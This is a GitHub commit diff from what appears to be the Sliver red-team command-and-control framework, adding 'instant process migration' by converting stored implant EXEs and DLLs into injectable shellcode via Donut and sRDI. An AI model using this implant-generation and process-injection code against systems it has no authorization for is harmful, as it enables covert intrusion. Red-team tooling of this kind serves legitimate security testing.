Instant process migration

BishopFox · Aug 16, 2020 · 10a101b · 10a101b
1 parent 74bc83a
commit 10a101b
Show file tree

Hide file tree

Showing 3 changed files with 37 additions and 9 deletions.
diff --git a/server/generate/binaries.go b/server/generate/binaries.go
@@ -311,7 +311,7 @@ func SliverShellcode(config *ImplantConfig) (string, error) {
 	_, err = gogo.GoBuild(*goConfig, pkgPath, dest, "pie", tags, ldflags, gcflags, asmflags, trimpath)
 	// _, err = gogo.GoBuild(*goConfig, pkgPath, dest, "c-shared", tags, ldflags, gcflags, asmflags, trimpath)
 	config.FileName = path.Base(dest)
-	shellcode, err := ShellcodeFromFile(dest, "x84", false, "", "", "")
+	shellcode, err := DonutShellcodeFromFile(dest, "x84", false, "", "", "")
 	// shellcode, err := ShellcodeRDI(dest, "RunSliver", "")
 	if err != nil {
 		return "", err

diff --git a/server/generate/donut.go b/server/generate/donut.go
@@ -9,8 +9,8 @@ import (
 	"github.com/binject/go-donut/donut"
 )
 
-// ShellcodeFromFile returns a Donut shellcode for the given PE file
-func ShellcodeFromFile(filePath string, arch string, dotnet bool, params string, className string, method string) (data []byte, err error) {
+// DonutShellcodeFromFile returns a Donut shellcode for the given PE file
+func DonutShellcodeFromFile(filePath string, arch string, dotnet bool, params string, className string, method string) (data []byte, err error) {
 	pe, err := ioutil.ReadFile(filePath)
 	if err != nil {
 		return
@@ -36,11 +36,11 @@ func ShellcodeFromFile(filePath string, arch string, dotnet bool, params string,
 	case ".vbs":
 		donutType = donut.DONUT_MODULE_VBS
 	}
-	return ShellcodeFromPE(pe, arch, dotnet, params, className, method, donutType)
+	return DonutShellcodeFromPE(pe, arch, dotnet, params, className, method, donutType)
 }
 
-// ShellcodeFromPE returns a Donut shellcode for the given PE file
-func ShellcodeFromPE(pe []byte, arch string, dotnet bool, params string, className string, method string, donutType donut.ModuleType) (data []byte, err error) {
+// DonutShellcodeFromPE returns a Donut shellcode for the given PE file
+func DonutShellcodeFromPE(pe []byte, arch string, dotnet bool, params string, className string, method string, donutType donut.ModuleType) (data []byte, err error) {
 	var donutArch donut.DonutArch
 	switch strings.ToLower(arch) {
 	case "x32", "386":
@@ -65,7 +65,7 @@ func ShellcodeFromPE(pe []byte, arch string, dotnet bool, params string, classNa
 		Arch:       donutArch,
 		Entropy:    0,         // 1=disable, 2=use random names, 3=random names + symmetric encryption (default)
 		Compress:   uint32(1), // 1=disable, 2=LZNT1, 3=Xpress, 4=Xpress Huffman
-		Thread:     0,         // start a new thread
+		Thread:     1,         // start a new thread
 		ExitOpt:    1,         // exit thread
 		Unicode:    0,
 	}

diff --git a/server/rpc/rpc-tasks.go b/server/rpc/rpc-tasks.go
@@ -30,6 +30,7 @@ import (
 	"path"
 	"strings"
 
+	"github.com/binject/go-donut/donut"
 	"github.com/bishopfox/sliver/protobuf/clientpb"
 	"github.com/bishopfox/sliver/protobuf/sliverpb"
 	"github.com/bishopfox/sliver/server/assets"
@@ -67,6 +68,8 @@ func (rpc *Server) Migrate(ctx context.Context, req *clientpb.MigrateReq) (*sliv
 			return nil, err
 		}
 		shellcode, err = ioutil.ReadFile(shellcodePath)
+	} else {
+		rpcLog.Debugf("Got shellcode: len = %d\n", len(shellcode))
 	}
 	reqData, err := proto.Marshal(&sliverpb.InvokeMigrateReq{
 		Request: req.Request,
@@ -202,13 +205,38 @@ func getSliverShellcode(name string) ([]byte, error) {
 	}
 	// get the implant with the same name
 	if conf, ok := configs[name]; ok {
-		if conf.Format == clientpb.ImplantConfig_SHELLCODE {
+		switch conf.Format {
+		case clientpb.ImplantConfig_SHELLCODE:
 			fileData, err := generate.ImplantFileByName(name)
 			if err != nil {
 				return data, err
 			}
 			data = fileData
-		} else {
+		case clientpb.ImplantConfig_EXECUTABLE:
+			// retrieve EXE from db
+			fileData, err := generate.ImplantFileByName(name)
+			rpcLog.Debugf("Found implant. Len: %d\n", len(fileData))
+			if err != nil {
+				return data, err
+			}
+			data, err = generate.DonutShellcodeFromPE(fileData, "x84", false, "", "", "", donut.DONUT_MODULE_EXE)
+			if err != nil {
+				rpcLog.Errorf("DonutShellcodeFromPE error: %v\n", err)
+				return data, err
+			}
+		case clientpb.ImplantConfig_SHARED_LIB:
+			// retrieve DLL from db
+			fileData, err := generate.ImplantFileByName(name)
+			if err != nil {
+				return data, err
+			}
+			data, err = generate.ShellcodeRDIFromBytes(fileData, "RunSliver", "")
+			if err != nil {
+				return data, err
+			}
+		case clientpb.ImplantConfig_SERVICE:
+			fallthrough
+		default:
 			err = fmt.Errorf("no existing shellcode found")
 		}
 	} else {